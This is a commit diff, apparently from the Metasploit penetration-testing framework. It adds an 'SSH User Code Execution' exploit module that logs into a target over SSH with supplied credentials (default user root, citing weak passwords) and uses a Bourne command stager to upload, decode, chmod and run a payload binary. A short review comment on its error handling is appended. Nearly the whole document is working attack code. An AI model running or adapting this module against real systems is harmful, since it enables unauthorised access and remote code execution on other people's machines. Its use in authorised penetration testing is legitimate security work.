
Commit d79a3c8

committed
list valid DECODER values and add the sshexec module
1 parent 1a98393 commit d79a3c8


2 files changed

+128
-1
lines changed

2 files changed

+128
-1
lines changed

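--- a/lib/msf/core/exploit/cmdstager_bourne.rb
+++ b/lib/msf/core/exploit/cmdstager_bourne.rb
@@ -21,7 +21,7 @@ def initialize(info = {})
 
 register_advanced_options(
 [
-OptString.new( 'DECODER', [ true, 'The decoding binary to use.', 'base64']),
+OptString.new( 'DECODER', [ true, 'The decoding binary to use. (base64, openssl, python, perl)', 'base64']),
 ], self.class)
 end
 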
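--- /dev/null
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -0,0 +1,127 @@
+
+require 'msf/core'
+require 'net/ssh'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ManualRanking
+
+include Msf::Exploit::CmdStagerBourne
+
+attr_accessor :ssh_socket
+
+def initialize
+super(
+'Name' => 'SSH User Code Execution',
+'Version' => '',
+'Description' => %q{
+This module utilizes a stager to upload a base64 encoded
+binary which is then decoded, chmod'ed and executed from
+the command shell.
+},
+'Author' => ['Spencer McIntyre', 'Brandon Knight'],
+'References' =>
+[
+[ 'CVE', '1999-0502'] # Weak password
+],
+'License' => MSF_LICENSE,
+'Privileged' => true,
+'DefaultOptions' =>
+{
+'PrependFork' => 'true',
+'EXITFUNC' => 'process'
+},
+'Payload' =>
+{
+'Space' => 4096,
+'BadChars' => "",
+'DisableNops' => true
+},
+'Platform' => [ 'osx', 'linux' ],
+'Targets' =>
+[
+[ 'Linux x86',
+{
+'Arch' => ARCH_X86,
+'Platform' => 'linux'
+},
+],
+[ 'Linux x64',
+{
+'Arch' => ARCH_X86_64,
+'Platform' => 'linux'
+},
+],
+[ 'OSX x86',
+{
+'Arch' => ARCH_X86,
+'Platform' => 'osx'
+},
+],
+],
+'DefaultTarget' => 0,
+# For the CVE
+'DisclosureDate' => 'Jan 01 1999'
+)
+
+register_options(
+[
+OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
+OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
+OptString.new('RHOST', [ true, "The target address" ]),
+Opt::RPORT(22)
+], self.class
+)
+
+register_advanced_options(
+[
+OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])
+]
+)
+end
+
+def execute_command(cmd, opts)
+begin
+Timeout.timeout(3) do
+self.ssh_socket.exec!(cmd)
+end
+rescue ::Exception
+end
+end
+
+def do_login(ip, user, pass, port)
+opt_hash = {
+:auth_methods => ['password', 'keyboard-interactive'],
+:msframework => framework,
+:msfmodule => self,
+:port => port,
+:disable_agent => true,
+:password => pass
+}
+
+opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+begin
+self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
+rescue Rex::ConnectionError, Rex::AddressInUse
+fail_with(Exploit::Failure::Unreachable, 'Disconnected during negotiation')
+rescue Net::SSH::Disconnect, ::EOFError
+fail_with(Exploit::Failure::Disconnected, 'Timed out during negotiation')
+rescue Net::SSH::AuthenticationFailed
+fail_with(Exploit::Failure::NoAccess, 'Failed authentication')
+rescue Net::SSH::Exception => e
+fail_with(Exploit::Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
+end
+
+if not self.ssh_socket
+fail_with(Exploit::Failure::Unknown)
+end
+return
+end
+
+def exploit
+do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
+
+print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...")
+execute_cmdstager({:linemax => 500})
+end
+end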
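Review bot: `execute_command` rescues `::Exception` with an empty body (new-file line 87), so a timeout, a dropped SSH session or even an Interrupt while the stager streams its commands is swallowed and the module carries on as if every chunk was delivered; the only visible symptom would be a session that never arrives, with no indication which line failed. Narrow the rescue to what `exec!` and the timeout can actually raise and report it, e.g. `rescue ::Timeout::Error, ::Net::SSH::Exception => e` followed by `vprint_error("Command failed: #{e.class}: #{e.message}")`. The `opts` parameter is unused; it is presumably the cmdstager's per-call options hash, so either forward it or rename it `_opts` to make the intent explicit. `Timeout` is referenced without a `require 'timeout'`; this presumably works because the framework loads it elsewhere, but the module would be self-contained with the explicit require next to `require 'net/ssh'`.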
